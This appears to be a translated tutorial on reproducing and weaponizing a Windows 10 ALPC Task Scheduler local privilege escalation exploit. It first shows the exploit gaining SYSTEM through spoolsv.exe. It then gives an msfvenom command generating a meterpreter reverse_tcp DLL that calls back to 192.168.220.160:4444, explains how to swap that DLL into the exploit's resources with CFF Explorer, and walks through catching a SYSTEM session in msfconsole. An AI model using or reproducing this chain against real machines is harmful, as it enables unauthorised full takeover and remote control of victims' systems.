Windows 10 vulnerability reproduction and weaponization

Project address: https://github.com/SandboxEscaper/randomrepo

Download addresses of the related tools:

Process Explorer: https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer

CFF Explorer: https://ntcore.com/?page_id=388

Reproduction:

Open Notepad and Process Explorer.

The PID of Notepad is 1944.

Next, run the exploit.

The 1944 in the screenshot above is the PID of Notepad. Enter it.

spoolsv.exe now shows one more process tree.

This process tree will not be killed.

Right-click -> Kill Process Tree

The current process is now a SYSTEM process.

Weaponization

Generate a DLL file

┌─[root@sch01ar]─[~]
└──╼ #msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.220.160 lport=4444 -f dll -o sch01ar.dll

Copy the generated DLL file to the Windows 10 machine.

Use CFF Explorer to open the original ALPC-TaskSched-LPE.dll.

Click Resource Editor.

Right-click -> Replace Resource

Then select sch01ar.dll.

Save.

When asked whether to overwrite the original file, the choice is

Open MSF

┌─[root@sch01ar]─[~]
└──╼ #msfconsole

Configure the related options and start the listener.

Switch back to Windows 10

A window will pop up.

msf receives a session.

msf exploit(handler) > sessions -i 1

SYSTEM privileges.
